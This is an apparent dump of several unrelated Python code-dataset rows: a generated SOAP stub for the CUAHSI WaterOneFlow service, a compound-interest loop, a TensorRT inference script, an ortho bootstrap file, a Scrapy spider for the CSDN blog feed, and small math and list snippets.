<soap:body use=\"literal\"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name=\"GetVariableInfo\">
<soap:operation soapAction=\"http://www.cuahsi.org/his/1.0/ws/GetVariableInfo\" style=\"document\"/>
<wsdl:input>
<soap:body use=\"literal\"/>
</wsdl:input>
<wsdl:output>
<soap:body use=\"literal\"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name=\"GetSites\">
<soap:operation soapAction=\"http://www.cuahsi.org/his/1.0/ws/GetSites\" style=\"document\"/>
<wsdl:input>
<soap:body use=\"literal\"/>
</wsdl:input>
<wsdl:output>
<soap:body use=\"literal\"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name=\"GetSiteInfoObject\">
<soap:operation soapAction=\"http://www.cuahsi.org/his/1.0/ws/GetSiteInfoObject\" style=\"document\"/>
<wsdl:input>
<soap:body use=\"literal\"/>
</wsdl:input>
<wsdl:output>
<soap:body use=\"literal\"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name=\"GetVariableInfoObject\">
<soap:operation soapAction=\"http://www.cuahsi.org/his/1.0/ws/GetVariableInfoObject\" style=\"document\"/>
<wsdl:input>
<soap:body use=\"literal\"/>
</wsdl:input>
<wsdl:output>
<soap:body use=\"literal\"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name=\"GetValues\">
<soap:operation soapAction=\"http://www.cuahsi.org/his/1.0/ws/GetValues\" style=\"document\"/>
<wsdl:input>
<soap:body use=\"literal\"/>
</wsdl:input>
<wsdl:output>
<soap:body use=\"literal\"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name=\"GetValuesObject\">
<soap:operation soapAction=\"http://www.cuahsi.org/his/1.0/ws/GetValuesObject\" style=\"document\"/>
<wsdl:input>
<soap:body use=\"literal\"/>
</wsdl:input>
<wsdl:output>
<soap:body use=\"literal\"/>
</wsdl:output>
</wsdl:operation>
</wsdl:binding>
<wsdl:binding name=\"WaterOneFlow1\" type=\"tns:WaterOneFlow\">
<soap12:binding transport=\"http://schemas.xmlsoap.org/soap/http\"/>
<wsdl:operation name=\"GetSitesXml\">
<soap12:operation soapAction=\"http://www.cuahsi.org/his/1.0/ws/GetSitesXml\" style=\"document\"/>
<wsdl:input>
<soap12:body use=\"literal\"/>
</wsdl:input>
<wsdl:output>
<soap12:body use=\"literal\"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name=\"GetSiteInfo\">
<soap12:operation soapAction=\"http://www.cuahsi.org/his/1.0/ws/GetSiteInfo\" style=\"document\"/>
<wsdl:input>
<soap12:body use=\"literal\"/>
</wsdl:input>
<wsdl:output>
<soap12:body use=\"literal\"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name=\"GetVariableInfo\">
<soap12:operation soapAction=\"http://www.cuahsi.org/his/1.0/ws/GetVariableInfo\" style=\"document\"/>
<wsdl:input>
<soap12:body use=\"literal\"/>
</wsdl:input>
<wsdl:output>
<soap12:body use=\"literal\"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name=\"GetSites\">
<soap12:operation soapAction=\"http://www.cuahsi.org/his/1.0/ws/GetSites\" style=\"document\"/>
<wsdl:input>
<soap12:body use=\"literal\"/>
</wsdl:input>
<wsdl:output>
<soap12:body use=\"literal\"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name=\"GetSiteInfoObject\">
<soap12:operation soapAction=\"http://www.cuahsi.org/his/1.0/ws/GetSiteInfoObject\" style=\"document\"/>
<wsdl:input>
<soap12:body use=\"literal\"/>
</wsdl:input>
<wsdl:output>
<soap12:body use=\"literal\"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name=\"GetVariableInfoObject\">
<soap12:operation soapAction=\"http://www.cuahsi.org/his/1.0/ws/GetVariableInfoObject\" style=\"document\"/>
<wsdl:input>
<soap12:body use=\"literal\"/>
</wsdl:input>
<wsdl:output>
<soap12:body use=\"literal\"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name=\"GetValues\">
<soap12:operation soapAction=\"http://www.cuahsi.org/his/1.0/ws/GetValues\" style=\"document\"/>
<wsdl:input>
<soap12:body use=\"literal\"/>
</wsdl:input>
<wsdl:output>
<soap12:body use=\"literal\"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name=\"GetValuesObject\">
<soap12:operation soapAction=\"http://www.cuahsi.org/his/1.0/ws/GetValuesObject\" style=\"document\"/>
<wsdl:input>
<soap12:body use=\"literal\"/>
</wsdl:input>
<wsdl:output>
<soap12:body use=\"literal\"/>
</wsdl:output>
</wsdl:operation>
</wsdl:binding>
<wsdl:service name=\"WaterOneFlow\">
<wsdl:documentation xmlns:wsdl=\"http://schemas.xmlsoap.org/wsdl/\"><div><strong>Developmental service. This service is internal CUAHSI use, and evaluation.</strong></div></wsdl:documentation>
<wsdl:port binding=\"tns:WaterOneFlow\" name=\"WaterOneFlow\">
<soap:address location=\"http://his.crwr.utexas.edu/tpwd/cuahsi_1_0.asmx\"/>
</wsdl:port>
<wsdl:port binding=\"tns:WaterOneFlow1\" name=\"WaterOneFlow1\">
<soap12:address location=\"http://his.crwr.utexas.edu/tpwd/cuahsi_1_0.asmx\"/>
</wsdl:port>
</wsdl:service>
</wsdl:definitions>"""
def __init__(self, post='/tpwd/cuahsi_1_0.asmx', **kw):
    # Register this service at the WaterOneFlow endpoint path.
    # Extra keyword arguments are accepted for ZSI call-compatibility but
    # are not forwarded — presumably intentional in the generated code.
    ServiceSOAPBinding.__init__(self, post)
# --- SOAP 1.1 dispatch handlers (ZSI-generated stubs) --------------------
# Each handler parses the incoming ParsedSoap `ps` into the typed request
# object and returns an empty typed response; a real implementation is
# expected to fill in the response.  The class-level `soapAction` and
# `root` dictionary entries map the HTTP SOAPAction header and the request
# root element, respectively, to the handler method name for dispatch.
def soap_GetSitesXml(self, ps):
    # Deserialize the request; the result is kept on self.request.
    self.request = ps.Parse(GetSitesXmlSoapIn.typecode)
    return GetSitesXmlSoapOut()
soapAction['http://www.cuahsi.org/his/1.0/ws/GetSitesXml'] = 'soap_GetSitesXml'
root[(GetSitesXmlSoapIn.typecode.nspname,GetSitesXmlSoapIn.typecode.pname)] = 'soap_GetSitesXml'

def soap_GetSiteInfo(self, ps):
    self.request = ps.Parse(GetSiteInfoSoapIn.typecode)
    return GetSiteInfoSoapOut()
soapAction['http://www.cuahsi.org/his/1.0/ws/GetSiteInfo'] = 'soap_GetSiteInfo'
root[(GetSiteInfoSoapIn.typecode.nspname,GetSiteInfoSoapIn.typecode.pname)] = 'soap_GetSiteInfo'

def soap_GetVariableInfo(self, ps):
    self.request = ps.Parse(GetVariableInfoSoapIn.typecode)
    return GetVariableInfoSoapOut()
soapAction['http://www.cuahsi.org/his/1.0/ws/GetVariableInfo'] = 'soap_GetVariableInfo'
root[(GetVariableInfoSoapIn.typecode.nspname,GetVariableInfoSoapIn.typecode.pname)] = 'soap_GetVariableInfo'

def soap_GetSites(self, ps):
    self.request = ps.Parse(GetSitesSoapIn.typecode)
    return GetSitesSoapOut()
soapAction['http://www.cuahsi.org/his/1.0/ws/GetSites'] = 'soap_GetSites'
root[(GetSitesSoapIn.typecode.nspname,GetSitesSoapIn.typecode.pname)] = 'soap_GetSites'

def soap_GetSiteInfoObject(self, ps):
    self.request = ps.Parse(GetSiteInfoObjectSoapIn.typecode)
    return GetSiteInfoObjectSoapOut()
soapAction['http://www.cuahsi.org/his/1.0/ws/GetSiteInfoObject'] = 'soap_GetSiteInfoObject'
root[(GetSiteInfoObjectSoapIn.typecode.nspname,GetSiteInfoObjectSoapIn.typecode.pname)] = 'soap_GetSiteInfoObject'

def soap_GetVariableInfoObject(self, ps):
    self.request = ps.Parse(GetVariableInfoObjectSoapIn.typecode)
    return GetVariableInfoObjectSoapOut()
soapAction['http://www.cuahsi.org/his/1.0/ws/GetVariableInfoObject'] = 'soap_GetVariableInfoObject'
root[(GetVariableInfoObjectSoapIn.typecode.nspname,GetVariableInfoObjectSoapIn.typecode.pname)] = 'soap_GetVariableInfoObject'

def soap_GetValues(self, ps):
    self.request = ps.Parse(GetValuesSoapIn.typecode)
    return GetValuesSoapOut()
soapAction['http://www.cuahsi.org/his/1.0/ws/GetValues'] = 'soap_GetValues'
root[(GetValuesSoapIn.typecode.nspname,GetValuesSoapIn.typecode.pname)] = 'soap_GetValues'

def soap_GetValuesObject(self, ps):
    self.request = ps.Parse(GetValuesObjectSoapIn.typecode)
    return GetValuesObjectSoapOut()
soapAction['http://www.cuahsi.org/his/1.0/ws/GetValuesObject'] = 'soap_GetValuesObject'
root[(GetValuesObjectSoapIn.typecode.nspname,GetValuesObjectSoapIn.typecode.pname)] = 'soap_GetValuesObject'
# --- SOAP 1.2 dispatch handlers (ZSI-generated stubs) --------------------
# NOTE(review): these redefine the methods above with identical bodies, so
# the later definitions are the ones that remain bound on the class.  Every
# entry below registers under the empty SOAPAction key '', so each
# assignment to soapAction[''] overwrites the previous one and only the
# last handler ('soap_GetValuesObject') survives under that key.  This
# looks like generated-code behavior for the second (SOAP 1.2) binding —
# confirm before relying on soapAction[''] routing.
def soap_GetSitesXml(self, ps):
    self.request = ps.Parse(GetSitesXmlSoapIn.typecode)
    return GetSitesXmlSoapOut()
soapAction[''] = 'soap_GetSitesXml'
root[(GetSitesXmlSoapIn.typecode.nspname,GetSitesXmlSoapIn.typecode.pname)] = 'soap_GetSitesXml'

def soap_GetSiteInfo(self, ps):
    self.request = ps.Parse(GetSiteInfoSoapIn.typecode)
    return GetSiteInfoSoapOut()
soapAction[''] = 'soap_GetSiteInfo'
root[(GetSiteInfoSoapIn.typecode.nspname,GetSiteInfoSoapIn.typecode.pname)] = 'soap_GetSiteInfo'

def soap_GetVariableInfo(self, ps):
    self.request = ps.Parse(GetVariableInfoSoapIn.typecode)
    return GetVariableInfoSoapOut()
soapAction[''] = 'soap_GetVariableInfo'
root[(GetVariableInfoSoapIn.typecode.nspname,GetVariableInfoSoapIn.typecode.pname)] = 'soap_GetVariableInfo'

def soap_GetSites(self, ps):
    self.request = ps.Parse(GetSitesSoapIn.typecode)
    return GetSitesSoapOut()
soapAction[''] = 'soap_GetSites'
root[(GetSitesSoapIn.typecode.nspname,GetSitesSoapIn.typecode.pname)] = 'soap_GetSites'

def soap_GetSiteInfoObject(self, ps):
    self.request = ps.Parse(GetSiteInfoObjectSoapIn.typecode)
    return GetSiteInfoObjectSoapOut()
soapAction[''] = 'soap_GetSiteInfoObject'
root[(GetSiteInfoObjectSoapIn.typecode.nspname,GetSiteInfoObjectSoapIn.typecode.pname)] = 'soap_GetSiteInfoObject'

def soap_GetVariableInfoObject(self, ps):
    self.request = ps.Parse(GetVariableInfoObjectSoapIn.typecode)
    return GetVariableInfoObjectSoapOut()
soapAction[''] = 'soap_GetVariableInfoObject'
root[(GetVariableInfoObjectSoapIn.typecode.nspname,GetVariableInfoObjectSoapIn.typecode.pname)] = 'soap_GetVariableInfoObject'

def soap_GetValues(self, ps):
    self.request = ps.Parse(GetValuesSoapIn.typecode)
    return GetValuesSoapOut()
soapAction[''] = 'soap_GetValues'
root[(GetValuesSoapIn.typecode.nspname,GetValuesSoapIn.typecode.pname)] = 'soap_GetValues'

def soap_GetValuesObject(self, ps):
    self.request = ps.Parse(GetValuesObjectSoapIn.typecode)
    return GetValuesObjectSoapOut()
soapAction[''] = 'soap_GetValuesObject'
root[(GetValuesObjectSoapIn.typecode.nspname,GetValuesObjectSoapIn.typecode.pname)] = 'soap_GetValuesObject'
|
"""Compute the balance after 48 periods of deposits with compound interest.

Each period adds a fixed deposit to the running balance and then applies
1.6% interest to the new balance.  This replaces 48 copy-pasted
``finalN = ...`` lines with a loop that performs the identical arithmetic
(same operation order, so the floating-point result is bit-for-bit equal
to the original ``final48``).
"""
num = 300  # fixed amount deposited each period
rate = 1.6 / 100  # per-period interest rate (1.6%)

total = 0.0
for _ in range(48):
    # Deposit first, then apply interest to the whole balance —
    # exactly finalN = prev + num + ((prev + num) * (1.6/100)).
    total = total + num
    total = total + total * rate

print('-> {}'.format(total))
|
990,995 | a77533994d1857badeb0fd4f99bb42bb25f21f30 | #!/usr/bin/env python3
#
# SPDX-FileCopyrightText: Copyright (c) 1993-2023 NVIDIA CORPORATION & AFFILIATES. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
This script loads the TensorRT engine built by `build_and_run.py` and runs inference.
"""
import numpy as np
from polygraphy.backend.common import BytesFromPath
from polygraphy.backend.trt import EngineFromBytes, TrtRunner
def main():
    """Deserialize the prebuilt ``identity.engine`` file and run inference.

    Mirrors the build script: loaders are composed so that the file bytes
    are read first, then turned into a TensorRT engine.
    """
    deserialize_engine = EngineFromBytes(BytesFromPath("identity.engine"))

    # TrtRunner activates the engine for the duration of the `with` body.
    with TrtRunner(deserialize_engine) as runner:
        feed = np.ones(shape=(1, 1, 2, 2), dtype=np.float32)

        # The runner owns (and may reuse) its output buffers between
        # `infer()` calls — deep-copy the outputs if you need to keep them.
        results = runner.infer(feed_dict={"x": feed})

        # Identity model: the output must equal the input exactly.
        assert np.array_equal(results["y"], feed)

        print("Inference succeeded!")


if __name__ == "__main__":
    main()
|
990,996 | 80f95fa98b5bc37bcea7fa02b69b2e30ce231a3b | #!/usr/bin/env python -B
"""
Bootstrap the configuration for a module that uses the ortho module to control the configuration.
Note that this script must be called `bootstrap.py` and must supply a function called `bootstrap_default`
which returns the default configuration and/or a function called `bootstrap_post` which runs other
configuration tasks. If these are missing the user is warned.
"""
from __future__ import print_function
# currently using default envs which expects a local link to Miniconda3-latest-Linux-x86_64.sh
# see environments.py for instructions on (re)-loading a complicated envs section after bootstrapping
# you could also make your own default configuration for use with ortho
# Baseline configuration written out when no config exists yet.
# (The 'envs' section can be reloaded later; see environments.py.)
default_configuration = {
    'commands':[],
    #! tee will always log to file: 'tee':'log-last',
}


def bootstrap_default():
    """Return the default configuration dictionary.

    Called by ortho before any config file exists; other commands could be
    run here, but they cannot print to stdout and the config is not yet
    available to them.
    """
    return default_configuration
def bootstrap_post():
    """Run follow-up tasks after the configuration file has been written.

    NOTE(review): the original author reported that running ``make config``
    from here can fail for unknown reasons — behavior kept as-is.
    """
    import os
    print('status', 'running bootstrap_post from bootstrap.py')
    # Re-run the config target now that the file exists (shells out).
    os.system('make config')
|
990,997 | 14ac550e7b44d460a183b2084dfbd6b566511e8d | import math
# Demonstrate rounding the same value in both directions.
value = 3.7
print(math.floor(value))  # rounds down -> 3
print(math.ceil(value))   # rounds up   -> 4
990,998 | 3b24b3b877e7a6bc30666148c95adf9e172b7624 |
# csdn
import scrapy
import json
import time
class CsdnBlogsSpider(scrapy.Spider):
    """Scrapy spider that prints article fields from the CSDN homepage feed."""
    # t = str(time.time()).replace  # leftover experiment, never completed
    name = 'blogs_csdn_spider'
    allowed_domains = ['blog.csdn.net']
    # 'type=new' = articles from the latest refresh; 'type=more' would be
    # the full article list shown below the refreshed section.
    start_urls = ['https://blog.csdn.net/api/articles?type=new&category=home']

    def parse(self, response):
        # The endpoint returns JSON with an 'articles' list; print the
        # interesting fields of each entry (no items are yielded).
        data = json.loads(response.text)
        for item in data['articles']:
            print(item['title'])
            print(item['url'])
            print(item['views'])
            print(item['created_at'])
|
990,999 | 9f07a69fb51531aa26e45ee9898268f120d3dbb7 | # import re
#
# str = 'code // annotation'
#
# # ret = re.findall('o', str) # returns every match as a list
# ret = re.findall('\/\/[^\n]*', str) # returns all matches as a list; unclear why the slash (/) is escaped here
# # [^\n]* matches any character that is not (^) a newline (\n), repeated any number of times (*)
# ret2 = re.sub('\/\/[^\n]*', '', str)
# print(ret2)
# # print('\/\/')
ll = [1, 3, 5, 3, 4, 3]
# Iterate over a snapshot so removing elements from `ll` doesn't skip
# items; stop entirely once the value 5 is reached.
for value in list(ll):
    if value == 3:
        ll.remove(value)
    if value == 5:
        break
print(ll)
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.